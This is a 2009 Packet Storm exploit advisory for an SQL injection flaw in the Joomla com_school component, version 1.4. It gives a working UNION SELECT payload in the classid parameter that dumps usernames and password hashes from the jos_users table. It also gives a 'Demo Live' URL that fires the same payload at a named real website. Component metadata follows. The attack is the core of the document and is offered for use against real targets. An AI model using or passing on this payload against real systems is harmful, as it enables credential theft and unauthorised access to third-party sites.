Joomla School Component 1.4 SQL Injection

2009-06-08T00:00:00
ID PACKETSTORM:78139
Type packetstorm
Reporter Chip D3 Bi0s
Modified 2009-06-08T00:00:00

Description

                                        
                                            `----------------------------------------------------------------------  
Joomla Component com_school (classid) SQL injection Vulnerability  
----------------------------------------------------------------------  
  
###################################################  
[+] Author : Chip D3 Bi0s  
[+] Email : chipdebios[alt+64]gmail.com  
[+] Group : LatinHackTeam  
[+] Vulnerability : SQL injection  
###################################################  
  
________________________________________________________  
  
Example:  
  
http://localHost/path/index.php?option=com_school&Itemid=null&func=showclass&classid=<sql Code>  
  
<Sql Code>:  
-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*  
  
  
Demo Live:  
http://www.mariadecervello.com/index.php?option=com_school&Itemid=null&func=showclass&classid=-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*  
  
  
+++++++++++++++++++++++++++++++++  
[!] Produced in South America  
------------------------------------  
  
  
<name>school</name>  
<creationDate>18 July 2006</creationDate>  
<author>Soner (pisdoktor) Ekici - Alex Chaparro</author>  
<copyright>  
This component in released under the GNU/GPL License  
</copyright>  
<authorEmail>damj3t@gmail.com</authorEmail>  
<authorUrl>www.joomla.cl</authorUrl>  
<version>1.4</version>  
  
  
`